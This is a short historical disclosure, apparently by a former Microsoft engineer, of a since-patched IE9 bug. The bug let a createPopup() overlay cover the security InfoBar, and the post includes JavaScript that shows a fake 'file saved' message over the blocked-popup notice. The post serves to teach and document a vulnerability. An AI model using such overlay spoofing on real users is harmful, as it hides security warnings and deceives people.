The IE9 InfoBar (the yellow notification bar at the top of the content area) could be overlaid by a createPopup() positioned to cover it exactly. This allowed an attacker page to hide security notifications — such as the popup-blocked message — replacing them with attacker-controlled content.

var mainWindow = window.open("", "mainWindow");
var popUp = createPopup();
popUp.document.body.innerHTML = "Your file has been saved successfully.";
popUp.show(0, 10, 400, 20, document.body);
setTimeout("mainWindow.open()");

The setTimeout triggered the InfoBar (by opening a popup that would be blocked), and the createPopup was positioned to cover the exact pixel coordinates where the InfoBar appeared. From the user’s perspective, the legitimate security notification was invisible, replaced by a reassuring false message.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.